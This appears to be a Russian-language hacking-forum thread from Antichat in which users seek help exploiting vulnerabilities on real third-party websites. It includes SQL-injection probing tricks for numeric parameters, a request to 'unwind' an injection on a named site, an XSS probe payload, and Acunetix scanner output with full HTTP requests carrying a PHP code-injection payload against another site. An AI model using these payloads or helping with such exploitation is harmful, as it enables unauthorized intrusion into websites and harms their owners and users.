ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

27.07.2020, 23:54
|
|
Guest
Сообщений: n/a
Провел на форуме: 169212
Репутация:
441
|
|
Сообщение от FireRidlle
FireRidlle said:
↑
можно что что сделать?
99.9% - ничего. В случае PHP, может выглядеть так:
Код:
Code:
var_dump(intval("1'"));
var_dump(intval("2-1"));
var_dump(intval(-1));
int(1) //есть в бд
int(2) //есть в бд
int(-1) //нет такого, ошибка
|
|
|
|

29.07.2020, 02:18
|
|
Guest
Сообщений: n/a
Провел на форуме: 5363
Репутация:
12
|
|
Сообщение от FireRidlle
FireRidlle said:
↑
здравствуйте. вопрос по валидации числовых параметров. есть параметр page. если передать 1' то возвращает первую страницу, 1" так же, 2-1 то вторую страницу. -1 ошибка. можно что что сделать?
если intval вожно большое число 92233720368547758079 +1 , в запрос попадёт 2e+, но это при условии старого пыха
|
|
|
|

23.08.2020, 19:58
|
|
Участник форума
Регистрация: 10.01.2008
Сообщений: 199
Провел на форуме: 961428
Репутация:
662
|
|
Хелп помогите раскрутить
Код:
Code:
https://www.egtexpress.com/cs/zeme/slovinsko"/?no_cache=1
|
|
|

26.08.2020, 16:37
|
|
Guest
Сообщений: n/a
Провел на форуме: 97114
Репутация:
24
|
|
Привет Burp/Acunetix показывает XSS
site.com/ru/?'>alert(1)
Но в браузере происходит URL Encode
Вопрос есть тут или нет XSS? ведь и за URL Encode ничего не срабатывает.
Как эксплуатировать?
|
|
|
|

28.08.2020, 03:40
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме: 69033
Репутация:
8
|
|
Сообщение от Octavian
Octavian said:
↑
Привет Burp/Acunetix показывает XSS
site.com/ru/?'>alert(1)
Но в браузере происходит URL Encode
Вопрос есть тут или нет XSS? ведь и за URL Encode ничего не срабатывает.
Как эксплуатировать?
Юзать разные Tricks
Например для IE работает связка через 'location=URL' в чистом виде
Можно почитать подробнее у BlackFan - https://blog.blackfan.ru/2016/09/ie-location-bug.html
|
|
|

03.10.2020, 14:35
|
|
Guest
Сообщений: n/a
Провел на форуме: 3379
Репутация:
0
|
|
Нашел php code injection на сайте, не ложную. Нашел гайд. Но там на странице авторизации проходит выполнения кода. У меня нет. Кто подскажет как выполнить уязвимость. Могу скинуть со сканера уязвимость
|
|
|
|

04.10.2020, 00:23
|
|
Guest
Сообщений: n/a
Провел на форуме: 5363
Репутация:
12
|
|
Сообщение от Gutman999
Gutman999 said:
↑
Нашел php code injection на сайте, не ложную. Нашел гайд. Но там на странице авторизации проходит выполнения кода. У меня нет. Кто подскажет как выполнить уязвимость. Могу скинуть со сканера уязвимость
кидай
|
|
|
|

04.10.2020, 10:29
|
|
Guest
Сообщений: n/a
Провел на форуме: 3379
Репутация:
0
|
|
Прошу прощения. PHP Code Injection
Код:
Code:
PHP code injection
Vulnerability description
This script is vulnerable to PHP code injection.
The vulnerability affects https://www.site.de/widget.php , 7521
Discovered by /Scripts/PerScheme/PHP_Code_Injection.script
Attack details
JSON input 7521 was set to ${@print(md5(acunetix_wvs_security_test))}
Possible execution result:
63c19a6da79816b21429e5bb262daed8
HTTP request
POST /widget.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Connection: keep-alive
Cookie: language=0;sid=v8o8b0le02vr097h6vbfes1cd0;sid_key=oxid;cookieConsent=functional,marketing;bie_sCookieListId=dbb53ee616bcb82137ffd68e1d0e2f38;ga-disable-UA-27119953-1=true;tc_cj_v2=_rn_lh%5BfyfcheZZZ222H%7B%7D0%29%20/%243G-%20%21%20--%20-H%7D*%28ZZZKPJKNQLLLJOMKZZZ%5D;tCdebugLib=1;tc_custom_campaign=EXTERNAL_LINK@@@www.acunetix-referrer.com@@@1601474230887;tc_custom_cj=;tc_BasketFreeseSession=1;emos_jcvid=AXTfJhMocd6e1u6fAeE6klz_afKVWU7V:1:0:0:0:true:1
Authorization: Basic YW5vbnltb3VzOmFub255bW91cw==
Accept: */*
Accept-Encoding: gzip,deflate
Content-Length: 309
Host: www.site.de
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
actcontrol=celebros&&cl=marm_klfilter_widget&filterForm[size][]=%24{%40print(md5(acunetix_wvs_security_test))}&fnc=submitFilterForm&listtype=qwiser&parentView=celebros&searchHandle=UVQxMGFHVl9RajEwYUdWX1J6MDNOVEl4WGpGX1NUMXdjbWxqWlg1TFBUUl9URDB4ZmswOU1YNU9QVE5f&searchparam=the&sortAscending=1&sortFieldName=1
Также есть GET запрос
URL encoded GET input searchparam was set to ${@print(md5(acunetix_wvs_security_test))}
Possible execution result:
63c19a6da79816b21429e5bb262daed8
HTTP request
GET /index.php?search=&cl=celebros&searchparam=%24{%40print(md5(acunetix_wvs_security_test))} HTTP/1.1
Connection: keep-alive
Cookie: language=0;sid=inoaht3jja8trerg9gr98il824;sid_key=oxid;cookieConsent=functional,marketing;bie_sCookieListId=dbb53ee616bcb82137ffd68e1d0e2f38
Authorization: Basic YW5vbnltb3VzOmFub255bW91cw==
Accept: */*
Accept-Encoding: gzip,deflate
Host: www.site.de
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
|
|
|
|

05.10.2020, 14:41
|
|
Guest
Сообщений: n/a
Провел на форуме: 5363
Репутация:
12
|
|
Сообщение от Gutman999
Gutman999 said:
↑
Прошу прощения. PHP Code Injection
Код:
Code:
PHP code injection
Vulnerability description
This script is vulnerable to PHP code injection.
The vulnerability affects https://www.site.de/widget.php , 7521
Discovered by /Scripts/PerScheme/PHP_Code_Injection.script
Attack details
JSON input 7521 was set to ${@print(md5(acunetix_wvs_security_test))}
Possible execution result:
63c19a6da79816b21429e5bb262daed8
HTTP request
POST /widget.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Connection: keep-alive
Cookie: language=0;sid=v8o8b0le02vr097h6vbfes1cd0;sid_key=oxid;cookieConsent=functional,marketing;bie_sCookieListId=dbb53ee616bcb82137ffd68e1d0e2f38;ga-disable-UA-27119953-1=true;tc_cj_v2=_rn_lh%5BfyfcheZZZ222H%7B%7D0%29%20/%243G-%20%21%20--%20-H%7D*%28ZZZKPJKNQLLLJOMKZZZ%5D;tCdebugLib=1;tc_custom_campaign=EXTERNAL_LINK@@@www.acunetix-referrer.com@@@1601474230887;tc_custom_cj=;tc_BasketFreeseSession=1;emos_jcvid=AXTfJhMocd6e1u6fAeE6klz_afKVWU7V:1:0:0:0:true:1
Authorization: Basic YW5vbnltb3VzOmFub255bW91cw==
Accept: */*
Accept-Encoding: gzip,deflate
Content-Length: 309
Host: www.site.de
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
actcontrol=celebros&&cl=marm_klfilter_widget&filterForm[size][]=%24{%40print(md5(acunetix_wvs_security_test))}&fnc=submitFilterForm&listtype=qwiser&parentView=celebros&searchHandle=UVQxMGFHVl9RajEwYUdWX1J6MDNOVEl4WGpGX1NUMXdjbWxqWlg1TFBUUl9URDB4ZmswOU1YNU9QVE5f&searchparam=the&sortAscending=1&sortFieldName=1
Также есть GET запрос
URL encoded GET input searchparam was set to ${@print(md5(acunetix_wvs_security_test))}
Possible execution result:
63c19a6da79816b21429e5bb262daed8
HTTP request
GET /index.php?search=&cl=celebros&searchparam=%24{%40print(md5(acunetix_wvs_security_test))} HTTP/1.1
Connection: keep-alive
Cookie: language=0;sid=inoaht3jja8trerg9gr98il824;sid_key=oxid;cookieConsent=functional,marketing;bie_sCookieListId=dbb53ee616bcb82137ffd68e1d0e2f38
Authorization: Basic YW5vbnltb3VzOmFub255bW91cw==
Accept: */*
Accept-Encoding: gzip,deflate
Host: www.site.de
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
а хост какой?
|
|
|
|

08.10.2020, 14:56
|
|
Участник форума
Регистрация: 10.01.2008
Сообщений: 199
Провел на форуме: 961428
Репутация:
662
|
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|